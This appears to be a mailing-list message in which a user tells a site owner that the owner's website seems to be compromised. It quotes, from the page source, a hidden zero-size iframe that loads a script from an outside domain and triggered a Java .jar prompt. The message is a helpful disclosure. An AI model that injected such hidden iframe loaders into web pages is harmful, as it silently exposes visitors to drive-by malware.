And then I wondered... why the hell is Kim Aldis' site loading this
crap? So I restart my frozen firefox, edit my hosts file to block that
domain from resolving, flush my dns cache and try again.
So I check the page source and at the very bottom, there's a suspicious bit:
</html>
<!-- 1202807621 --><iframe src="http://x-traff.info/stds/go.php?sid=1"
width="0" height="0" frameborder="0"> </iframe>
x-traff.info doesn't appear to load any meaningful page, then there's
the /stds/ (viruses?) bit, and the fact it's in an invisible iframe
loading something mysterious from a completely irrelevant site. My
common sense raises a few flags at this point. (Thankfully, my AV
stopped everything and nothing ever ran, although I did get as far as
having Java prompt me for permission to execute the .jar.. which I
denied.)
Of course, I'm not saying you put that there yourself, Kim, but I just
wanted to point it out so you can confirm if my suspicions are true.
If they are, hopefully you can fix it and find out how it got there.
Cheers,
-- Alan
ps: I don't have your proper email address and I know you check the
list a lot, so I thought I'd find you through here. Hope you don't
mind.
